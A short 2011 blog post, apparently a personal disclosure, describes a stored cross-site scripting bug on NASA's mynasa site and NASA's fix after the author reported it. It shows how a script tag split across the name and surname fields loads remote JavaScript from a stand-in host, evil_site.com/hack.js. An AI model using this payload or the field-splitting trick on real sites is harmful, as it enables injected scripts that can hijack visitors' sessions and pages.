sábado, 6 de agosto de 2011

XSS on NASA Web site

Since I remember, I love the stupid films about hackers, my love for this kind of films are directly proportional to the stupid that they are.
On every stupid hackers movie the hackers should to be hacked the NASA computers at least one time, and I want to be a super-hacker.

I created an account on mynasa.nasa.gov and I discovered that they didn't use any kind of escape system for the name fields, the only thing that they do are not allow names or surnames with more length than 20 characters (OMG!!)

I created an account with the name:
  <script src="

And the surname:

Wen you do log-in on the site the name and the surname are showed together, building the next line:
<script src=" http://evil_site.com/hack.js">

And inside the target JavaScript file, I inserted the code to modify the site.
The problem is that wen you posts a new comment to a picture, or some any other content on the site your name and surname appear, and the JavaScript code are injected.
I reported this bug to the NASA, and they disabled the comment system, and now when you want to comment anything you should to insert your name each time, and a JavaScript function (¿?) verifies that you are not trying to insert any evil code, on a second instance, the comment pass a manual filter, after publish it.
You can see the video with an example:

No hay comentarios:

Publicar un comentario